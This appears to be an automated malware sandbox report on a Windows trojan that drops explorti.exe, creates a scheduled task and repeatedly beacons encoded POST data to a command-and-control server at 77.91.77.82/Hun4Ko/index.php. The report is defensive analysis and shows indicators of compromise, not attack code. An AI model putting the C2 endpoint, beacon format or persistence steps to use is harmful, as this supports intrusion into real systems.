                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: Joe Sandbox ViewIP Address: 77.91.77.82 77.91.77.82
                    Source: Joe Sandbox ViewASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00E9BD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,7_2_00E9BD30
                    Source: unknownHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php02k02k02k02k02k02k
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpC
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpM
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpT
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpW
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpa
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpft
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpk
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpu

                    System Summary

                    barindex
                    PE file contains section with special chars
                    Source: gNo9ad9KO4.exeStatic PE information: section name:
                    Source: gNo9ad9KO4.exeStatic PE information: section name: .idata
                    Source: gNo9ad9KO4.exeStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: .idata
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00E94CD07_2_00E94CD0
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00ED30487_2_00ED3048
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00E9E9B07_2_00E9E9B0
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00EC7D637_2_00EC7D63
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00ED6EE97_2_00ED6EE9
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00E94AD07_2_00E94AD0
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00ED763B7_2_00ED763B
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00ED2BB07_2_00ED2BB0
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00ED775B7_2_00ED775B
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00ED87007_2_00ED8700
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: String function: 00EA7840 appears 32 times
                    Source: gNo9ad9KO4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: gNo9ad9KO4.exeStatic PE information: Section: ZLIB complexity 0.9984631147540983
                    Source: gNo9ad9KO4.exeStatic PE information: Section: adkjkfkz ZLIB complexity 0.9944319686081694
                    Source: explorti.exe.0.drStatic PE information: Section: ZLIB complexity 0.9984631147540983
                    Source: explorti.exe.0.drStatic PE information: Section: adkjkfkz ZLIB complexity 0.9944319686081694
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeFile created: C:\Users\user\AppData\Local\Temp\ad40971b6bJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: gNo9ad9KO4.exeVirustotal: Detection: 51%
                    Source: gNo9ad9KO4.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeFile read: C:\Users\user\Desktop\gNo9ad9KO4.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\gNo9ad9KO4.exe "C:\Users\user\Desktop\gNo9ad9KO4.exe"
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
